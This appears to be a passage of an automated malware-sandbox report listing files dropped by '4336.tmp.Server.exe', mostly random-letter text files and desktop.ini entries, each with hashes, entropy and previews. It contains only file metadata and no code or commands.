                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):282
                                                                                                                                                                                                                                Entropy (8bit):3.5191090305155277
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
                                                                                                                                                                                                                                MD5:3A37312509712D4E12D27240137FF377
                                                                                                                                                                                                                                SHA1:30CED927E23B584725CF16351394175A6D2A9577
                                                                                                                                                                                                                                SHA-256:B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
                                                                                                                                                                                                                                SHA-512:DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.4.....
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):190
                                                                                                                                                                                                                                Entropy (8bit):3.5497401529130053
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
                                                                                                                                                                                                                                MD5:D48FCE44E0F298E5DB52FD5894502727
                                                                                                                                                                                                                                SHA1:FCE1E65756138A3CA4EAAF8F7642867205B44897
                                                                                                                                                                                                                                SHA-256:231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
                                                                                                                                                                                                                                SHA-512:A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):190
                                                                                                                                                                                                                                Entropy (8bit):3.5497401529130053
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
                                                                                                                                                                                                                                MD5:87A524A2F34307C674DBA10708585A5E
                                                                                                                                                                                                                                SHA1:E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
                                                                                                                                                                                                                                SHA-256:D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
                                                                                                                                                                                                                                SHA-512:7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):504
                                                                                                                                                                                                                                Entropy (8bit):3.514398793376306
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
                                                                                                                                                                                                                                MD5:29EAE335B77F438E05594D86A6CA22FF
                                                                                                                                                                                                                                SHA1:D62CCC830C249DE6B6532381B4C16A5F17F95D89
                                                                                                                                                                                                                                SHA-256:88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
                                                                                                                                                                                                                                SHA-512:5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
